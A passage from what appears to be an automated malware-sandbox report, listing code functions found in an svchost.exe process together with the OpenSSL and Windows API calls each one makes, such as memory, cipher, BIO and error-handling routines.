Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3688FD0 CRYPTO_free,CRYPTO_malloc,ERR_new,RAND_bytes_ex,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,42_2_00007FFDA3688FD0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3606FC0 EVP_MD_get_size,EVP_CIPHER_get_iv_length,EVP_CIPHER_get_key_length,CRYPTO_clear_free,CRYPTO_malloc,ERR_new,ERR_set_debug,42_2_00007FFDA3606FC0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA366EFA0 CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,ERR_new,ERR_set_debug,42_2_00007FFDA366EFA0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3662FA0 ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get0_cipher,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_set_mark,ERR_pop_to_mark,ERR_new,ERR_set_debug,ERR_clear_last_mark,EVP_CIPHER_CTX_get0_cipher,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,42_2_00007FFDA3662FA0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3676F60 memchr,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,42_2_00007FFDA3676F60
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3652F60 EVP_EncryptUpdate,OPENSSL_LH_retrieve,42_2_00007FFDA3652F60
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3615050 CRYPTO_set_ex_data,42_2_00007FFDA3615050
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3625040 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,42_2_00007FFDA3625040
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA366B040 CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,42_2_00007FFDA366B040
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3653040 RAND_priv_bytes_ex,CRYPTO_zalloc,EVP_CIPHER_fetch,EVP_CIPHER_CTX_new,EVP_CIPHER_free,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_free,OPENSSL_LH_doall,OPENSSL_LH_free,EVP_CIPHER_CTX_free,CRYPTO_free,EVP_CIPHER_free,42_2_00007FFDA3653040
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3601030 GetEnvironmentVariableW,GetACP,MultiByteToWideChar,malloc,MultiByteToWideChar,GetEnvironmentVariableW,malloc,GetEnvironmentVariableW,WideCharToMultiByte,CRYPTO_malloc,WideCharToMultiByte,CRYPTO_free,free,free,getenv,42_2_00007FFDA3601030
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA360D010 EVP_PKEY_free,X509_free,EVP_PKEY_free,OSSL_STACK_OF_X509_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_STORE_free,X509_STORE_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,42_2_00007FFDA360D010
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3621000 CRYPTO_malloc,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,CRYPTO_realloc,memcpy,ERR_new,ERR_new,ERR_set_debug,ERR_set_error,42_2_00007FFDA3621000
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA364CFF0 CRYPTO_realloc,42_2_00007FFDA364CFF0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA366AFE0 CRYPTO_free,42_2_00007FFDA366AFE0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA362CED0 CRYPTO_free,memset,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,42_2_00007FFDA362CED0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA365EED0 CRYPTO_malloc,CRYPTO_free,42_2_00007FFDA365EED0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3604E80 CRYPTO_free,42_2_00007FFDA3604E80
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3652F00 OPENSSL_LH_free,OPENSSL_LH_free,EVP_CIPHER_CTX_free,CRYPTO_free,42_2_00007FFDA3652F00
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3620EF0 CRYPTO_malloc,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,42_2_00007FFDA3620EF0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA365EDD0 OPENSSL_cleanse,CRYPTO_free,CRYPTO_free,CRYPTO_free,42_2_00007FFDA365EDD0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA361CDC0 CRYPTO_malloc,CRYPTO_clear_free,42_2_00007FFDA361CDC0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA360EDB0 CRYPTO_THREAD_run_once,42_2_00007FFDA360EDB0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3652DB0 OPENSSL_LH_retrieve,CRYPTO_free,OPENSSL_LH_delete,OPENSSL_LH_retrieve,OPENSSL_LH_insert,OPENSSL_LH_error,OPENSSL_LH_delete,CRYPTO_free,42_2_00007FFDA3652DB0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3680D80 CRYPTO_free,CRYPTO_free,CRYPTO_free,42_2_00007FFDA3680D80
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA360ECD0 COMP_get_type,CRYPTO_malloc,COMP_get_name,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_sort,42_2_00007FFDA360ECD0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3674CC0 EVP_MD_CTX_new,EVP_PKEY_new_raw_private_key_ex,EVP_DigestSignInit_ex,EVP_DigestSign,EVP_MD_CTX_free,EVP_PKEY_free,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,_time64,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_free,EVP_PKEY_free,ERR_new,ERR_set_debug,EVP_MD_CTX_free,EVP_PKEY_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,42_2_00007FFDA3674CC0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3624CB0 CRYPTO_zalloc,CRYPTO_new_ex_data,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free_ex_data,OPENSSL_cleanse,OPENSSL_cleanse,X509_free,EVP_PKEY_free,OSSL_STACK_OF_X509_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_clear_free,memcpy,42_2_00007FFDA3624CB0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3668CA0 CRYPTO_zalloc,OSSL_PARAM_get_int,ERR_new,OSSL_PARAM_get_uint,ERR_new,strcmp,OSSL_PARAM_get_uint32,ERR_new,strcmp,OSSL_PARAM_get_int,ERR_new,OSSL_PARAM_get_int,ERR_new,ERR_new,ERR_set_debug,BIO_up_ref,BIO_free,BIO_up_ref,BIO_up_ref,ERR_new,ERR_set_debug,ERR_set_error,EVP_CIPHER_is_a,EVP_CIPHER_is_a,42_2_00007FFDA3668CA0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3602C60 CRYPTO_zalloc,CRYPTO_free,42_2_00007FFDA3602C60
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3608C60 EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memset,42_2_00007FFDA3608C60
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA368CC60 BN_bin2bn,ERR_new,ERR_set_debug,BN_ucmp,BN_is_zero,CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,42_2_00007FFDA368CC60
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3634D30 SRP_Calc_u_ex,BN_num_bits,CRYPTO_malloc,ERR_new,ERR_set_debug,BN_bn2bin,BN_clear_free,BN_clear_free,42_2_00007FFDA3634D30
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA362CD10 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,42_2_00007FFDA362CD10
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA365ED00 OPENSSL_cleanse,CRYPTO_free,CRYPTO_free,42_2_00007FFDA365ED00
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36013A0 CRYPTO_free,42_2_00007FFDA36013A0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36793A0 ERR_new,ERR_set_debug,CRYPTO_clear_free,42_2_00007FFDA36793A0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3653380 CRYPTO_free,42_2_00007FFDA3653380
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA367B370 ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,CRYPTO_malloc,RAND_bytes_ex,EVP_MD_CTX_new,OBJ_nid2sn,EVP_get_digestbyname,EVP_DigestInit,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_MD_CTX_free,EVP_PKEY_CTX_free,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,CRYPTO_clear_free,EVP_MD_CTX_free,42_2_00007FFDA367B370
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA360D360 CRYPTO_zalloc,CRYPTO_zalloc,CRYPTO_free,42_2_00007FFDA360D360
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3617360 CRYPTO_free_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free,42_2_00007FFDA3617360
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3685360 ERR_new,i2d_PUBKEY,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,42_2_00007FFDA3685360
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA362D440 CRYPTO_free,CRYPTO_zalloc,OBJ_txt2nid,CONF_parse_list,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,memcpy,CRYPTO_free,CRYPTO_free,42_2_00007FFDA362D440
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3671430 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_strdup,ERR_new,ERR_set_debug,42_2_00007FFDA3671430
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA366B420 CRYPTO_free,42_2_00007FFDA366B420
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA363B2D0 CRYPTO_free,42_2_00007FFDA363B2D0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36232C0 CRYPTO_THREAD_write_lock,OPENSSL_LH_insert,OPENSSL_LH_retrieve,OPENSSL_LH_retrieve,OPENSSL_LH_delete,CRYPTO_THREAD_unlock,42_2_00007FFDA36232C0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36892A0 EVP_MD_get_size,ERR_new,ERR_set_debug,RAND_bytes_ex,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,42_2_00007FFDA36892A0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA364F290 CRYPTO_realloc,42_2_00007FFDA364F290
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA362D310 CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,42_2_00007FFDA362D310
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36292F0 CRYPTO_realloc,memcpy,42_2_00007FFDA36292F0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36551D0 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,BIO_up_ref,ERR_new,ERR_set_debug,ERR_set_error,BIO_free,ERR_new,ERR_set_debug,EVP_CIPHER_is_a,EVP_CIPHER_is_a,EVP_CIPHER_is_a,EVP_MD_up_ref,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,EVP_MD_free,ERR_new,ERR_set_debug,ERR_set_error,BIO_free,CRYPTO_free,42_2_00007FFDA36551D0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3655190 BIO_free,CRYPTO_free,42_2_00007FFDA3655190
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3605240 CRYPTO_zalloc,CRYPTO_free,42_2_00007FFDA3605240
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA360321D X509_VERIFY_PARAM_get0_peername,ASYNC_WAIT_CTX_get_status,BIO_clear_flags,BIO_set_init,CRYPTO_free,CRYPTO_zalloc,BIO_set_init,BIO_set_data,BIO_clear_flags,X509_VERIFY_PARAM_get0_peername,BIO_set_shutdown,BIO_push,BIO_set_next,BIO_up_ref,BIO_set_init,42_2_00007FFDA360321D
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3643220 CRYPTO_zalloc,CRYPTO_free,42_2_00007FFDA3643220
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3621210 BIO_s_file,BIO_new,ERR_new,ERR_set_debug,BIO_ctrl,ERR_new,ERR_set_debug,strncmp,ERR_new,ERR_set_debug,strncmp,CRYPTO_realloc,memcpy,CRYPTO_free,CRYPTO_free,CRYPTO_free,PEM_read_bio,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_free,42_2_00007FFDA3621210
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3653200 OPENSSL_LH_retrieve,OPENSSL_LH_insert,OPENSSL_LH_delete,CRYPTO_free,42_2_00007FFDA3653200
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36351E0 BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,CRYPTO_strdup,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,42_2_00007FFDA36351E0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36350D0 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,42_2_00007FFDA36350D0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA360B0B0 i2d_PUBKEY,ASN1_item_i2d,CRYPTO_free,42_2_00007FFDA360B0B0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3681090 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,42_2_00007FFDA3681090
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3615070 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,42_2_00007FFDA3615070
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA362D140 CRYPTO_free,CRYPTO_malloc,42_2_00007FFDA362D140
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA367B140 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,EVP_PKEY_free,EVP_PKEY_get_size,ERR_new,ERR_set_debug,memset,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,42_2_00007FFDA367B140
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3619120 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,42_2_00007FFDA3619120
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3651127 CRYPTO_realloc,42_2_00007FFDA3651127
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA363D100 CRYPTO_free,42_2_00007FFDA363D100
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA365F0F0 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,BIO_clear_flags,BIO_set_flags,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,42_2_00007FFDA365F0F0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36710E0 CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,42_2_00007FFDA36710E0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3615780 a2i_IPADDRESS,ASN1_OCTET_STRING_free,X509_VERIFY_PARAM_get1_ip_asc,CRYPTO_free,X509_VERIFY_PARAM_add1_host,42_2_00007FFDA3615780
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3675760 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,42_2_00007FFDA3675760
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3609850 ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_PKEY_decapsulate,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,EVP_PKEY_CTX_free,42_2_00007FFDA3609850
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3623840 OPENSSL_cleanse,OPENSSL_cleanse,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,42_2_00007FFDA3623840
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3615840 i2d_PUBKEY,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_zalloc,CRYPTO_malloc,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,memcpy,d2i_PUBKEY,EVP_PKEY_free,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_insert,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,42_2_00007FFDA3615840
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3613820 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_realloc,CRYPTO_realloc,42_2_00007FFDA3613820
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36356D0 CRYPTO_zalloc,42_2_00007FFDA36356D0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36676D0 CRYPTO_free,42_2_00007FFDA36676D0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36536D0 CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,42_2_00007FFDA36536D0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36036C0 X509_VERIFY_PARAM_get0_peername,BIO_get_shutdown,ASYNC_WAIT_CTX_get_status,BIO_clear_flags,BIO_set_init,CRYPTO_free,42_2_00007FFDA36036C0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36716B0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,42_2_00007FFDA36716B0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA361D68B X509_VERIFY_PARAM_free,BIO_pop,BIO_free,BUF_MEM_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,SCT_LIST_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_MD_CTX_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,OSSL_STACK_OF_X509_free,ASYNC_WAIT_CTX_free,CRYPTO_free,OPENSSL_sk_free,BIO_free_all,BIO_free_all,CRYPTO_free,42_2_00007FFDA361D68B
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3601740 CRYPTO_zalloc,CRYPTO_free,42_2_00007FFDA3601740
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3669730 CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,CRYPTO_free,42_2_00007FFDA3669730
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3613700 CRYPTO_zalloc,CRYPTO_zalloc,OBJ_nid2sn,EVP_get_digestbyname,OBJ_nid2sn,EVP_get_digestbyname,CRYPTO_free,CRYPTO_free,42_2_00007FFDA3613700
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA367B6E0 EVP_MD_CTX_new,EVP_DigestInit,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_MD_CTX_free,CRYPTO_malloc,RAND_bytes_ex,EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_encrypt_init,EVP_PKEY_CTX_ctrl,EVP_PKEY_CTX_ctrl,EVP_PKEY_encrypt,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,CRYPTO_clear_free,ERR_new,ERR_set_debug,42_2_00007FFDA367B6E0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36035C8 CRYPTO_zalloc,BIO_set_init,BIO_set_data,BIO_clear_flags,42_2_00007FFDA36035C8
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36575D0 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,42_2_00007FFDA36575D0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36015D0 CRYPTO_free,42_2_00007FFDA36015D0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36275B0 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,memcpy,memcpy,memcmp,memcmp,memcmp,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_clear_free,42_2_00007FFDA36275B0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36695A0 CRYPTO_free,42_2_00007FFDA36695A0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3609590 CRYPTO_free,CRYPTO_memdup,42_2_00007FFDA3609590
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA366B590 CRYPTO_free,42_2_00007FFDA366B590
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3623650 CRYPTO_THREAD_unlock,42_2_00007FFDA3623650
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3681650 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memcpy,CRYPTO_free,CRYPTO_free,CRYPTO_free,42_2_00007FFDA3681650
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3669620 CRYPTO_malloc,ERR_new,ERR_set_debug,42_2_00007FFDA3669620
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA363B5F0 CRYPTO_free,42_2_00007FFDA363B5F0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA366D5F0 ERR_new,ERR_set_debug,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,OPENSSL_cleanse,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_new,ERR_set_debug,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,CRYPTO_memcmp,ERR_new,ERR_new,42_2_00007FFDA366D5F0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA366B5E0 CRYPTO_free,42_2_00007FFDA366B5E0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA363B4B0 CRYPTO_zalloc,42_2_00007FFDA363B4B0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA366B4A0 CRYPTO_free,CRYPTO_free,42_2_00007FFDA366B4A0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3625550 CRYPTO_malloc,CRYPTO_new_ex_data,ERR_new,ERR_set_debug,ERR_set_error,X509_up_ref,ERR_new,ERR_set_debug,ERR_set_error,X509_chain_up_ref,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_up_ref,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_dup_ex_data,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_strdup,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_strdup,CRYPTO_memdup,42_2_00007FFDA3625550
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA368B550 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,memcmp,ERR_new,ERR_set_debug,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,42_2_00007FFDA368B550
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3669540 OPENSSL_cleanse,CRYPTO_free,42_2_00007FFDA3669540
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA360B500 CRYPTO_free,42_2_00007FFDA360B500
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3615500 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_strdup,42_2_00007FFDA3615500
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36234E0 CRYPTO_THREAD_write_lock,OPENSSL_LH_delete,OPENSSL_sk_push,OPENSSL_LH_set_down_load,CRYPTO_THREAD_unlock,OPENSSL_sk_pop_free,42_2_00007FFDA36234E0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA366D4E0 ERR_new,ERR_set_debug,CRYPTO_free,42_2_00007FFDA366D4E0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36774E0 CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,42_2_00007FFDA36774E0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3609C50 ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,CRYPTO_malloc,CRYPTO_malloc,EVP_PKEY_encapsulate,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,CRYPTO_free,EVP_PKEY_CTX_free,42_2_00007FFDA3609C50
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3603C40 ERR_clear_error,ERR_new,ERR_set_debug,CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,SetLastError,BIO_read,BIO_ADDR_new,BIO_ctrl,BIO_ctrl,BIO_ADDR_free,BIO_write,BIO_ctrl,BIO_test_flags,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,BIO_ctrl,BIO_ADDR_clear,BIO_write,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_